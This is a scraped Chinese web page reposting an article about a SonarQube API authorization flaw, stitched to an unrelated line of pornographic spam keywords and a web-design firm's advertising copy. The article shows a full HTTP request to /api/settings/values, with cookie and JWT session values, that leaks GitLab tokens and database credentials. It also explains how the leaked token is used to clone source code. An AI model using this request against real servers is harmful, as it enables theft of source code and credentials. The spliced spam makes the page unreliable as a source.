日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
SonarQubeAPI越權(quán)漏洞的思考

?[[433918]]?

創(chuàng)新互聯(lián)是一家集網(wǎng)站建設(shè),桂平企業(yè)網(wǎng)站建設(shè),桂平品牌網(wǎng)站建設(shè),網(wǎng)站定制,桂平網(wǎng)站建設(shè)報價,網(wǎng)絡(luò)營銷,網(wǎng)絡(luò)優(yōu)化,桂平網(wǎng)站推廣為一體的創(chuàng)新建站企業(yè),幫助傳統(tǒng)企業(yè)提升企業(yè)形象加強企業(yè)競爭力??沙浞譂M足這一群體相比中小企業(yè)更為豐富、高端、多元的互聯(lián)網(wǎng)需求。同時我們時刻保持專業(yè)、時尚、前沿,時刻以成就客戶成長自我,堅持不斷學(xué)習(xí)、思考、沉淀、凈化自己,讓我們?yōu)楦嗟钠髽I(yè)打造出實用型網(wǎng)站。

SonarQube是一款基于Web的工具,是一個開源的代碼質(zhì)量管理系統(tǒng),可幫助開發(fā)人員生成沒有安全問題、錯誤、漏洞、異常和一般問題的代碼。

如果您在開發(fā)一個小項目,那可能很容易,您可以仔細檢查代碼以發(fā)現(xiàn)任何問題。SonarQube屬于SAST類的代碼檢測工具,更側(cè)重于質(zhì)量檢查,也有一些針對性的安全檢測,比如SQL注入等,我用過商業(yè)版,試圖利用SAST來發(fā)現(xiàn)和解決代碼安全問題,比較失望。規(guī)則庫比較弱,自定義能力差,畢竟只是更專注于質(zhì)量檢查。

大背景

近期,境外網(wǎng)站又報道了一些涉及中國多個機構(gòu)和企業(yè)的代碼泄漏,就是利用SonarQube的這個API越權(quán)漏洞進行的。

(1)The Chinese Ministry of Public Security

 

(2) BOSCH 博世

(3) 梅賽德斯奔馳

SonarQube API 未授權(quán)下載源代碼漏洞利用過程及原理

SonarSource SonarQube由于存在安全漏洞,攻擊者可利用該漏洞通過API設(shè)置值URI,發(fā)現(xiàn)明文的SMTP和GitLab憑證(tocken)等敏感信息泄露,可導(dǎo)致gitlab中項目的代碼可以被任意clone下載,其實這個漏洞在2019年就被發(fā)現(xiàn)了。官方修復(fù)過一次,但是又出現(xiàn)了新的漏洞,并且一直延伸到7-8-9多個版本。

漏洞細節(jié):

漏洞利用過程及證明:
(1)敏感配置泄漏:
以普通用戶登陸就可以查看該AP I信息,如下:
GET /api/settings/values HTTP/2
Host: sonar.******.com
Cookie:    experimentation_subject_id=ImExZjYyYTg4LTUwMmEtNDllOS1hNDNhLTZkYjc3OWVhNDM3YiI%3D--5753e714d025d34f4249d6d9d8cc7292ca0200b6; XSRF-TOKEN=5n4f4tq6qi30hg65n2h0qth56e; JWT-SESSION=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJBWGpaWGotUmlDeWV5OUM0SnkwbCIsInN1YiI6ImZlbmd3ZWlndW8iLCJpYXQiOjE2MTg1NTQ1MzUsImV4cCI6MTYxODgxMzczNSwibGFzdFJlZnJlc2hUaW1lIjoxNjE4NTU0NTM1ODI1LCJ4c3JmVG9rZW4iOiI1bjRmNHRxNnFpMzBoZzY1bjJoMHF0aDU2ZSJ9.5GEbBs6oJnoRYnSbPC3BUysSZgy5tIu-LOuO7iOSEGI
Sec-Ch-Ua: "Chromium";v="89", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (KaliLinux; ARM) AppleWebKit/637.36 (KHTML, like Gecko) Chrome/189.0.4389.90 Safari/637.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

官方進行過修復(fù)然后該接口應(yīng)該只允許管理員可查看。
但是很多內(nèi)置了默認賬號和簡單弱口令賬號同樣可查看。

(2) 利用該user_token可以來從gitlab獲取代碼:

看,就是sonar.gitlab.user.token , 直接可以拉代碼數(shù)據(jù)。

還能通過配置文件看到數(shù)據(jù)庫賬號密碼等。非常久遠的漏洞了。

看看如何利用sonar.gitlab.user.token 拉代碼:

解決辦法

關(guān)注廠商官方網(wǎng)站,即使升級補丁。

友情提醒

看看至少有多少暴露在公網(wǎng):數(shù)量還是很驚人的,這么多假裝在乎代碼質(zhì)量的用戶,不在乎安全性個代碼泄露。

SonarQube 不建議對公網(wǎng)開放,Devops流程中如需要使用SAST請采用專業(yè)的工具,請棄用SonarQube。


分享文章:SonarQubeAPI越權(quán)漏洞的思考
轉(zhuǎn)載源于:http://m.5511xx.com/article/dhhccpj.html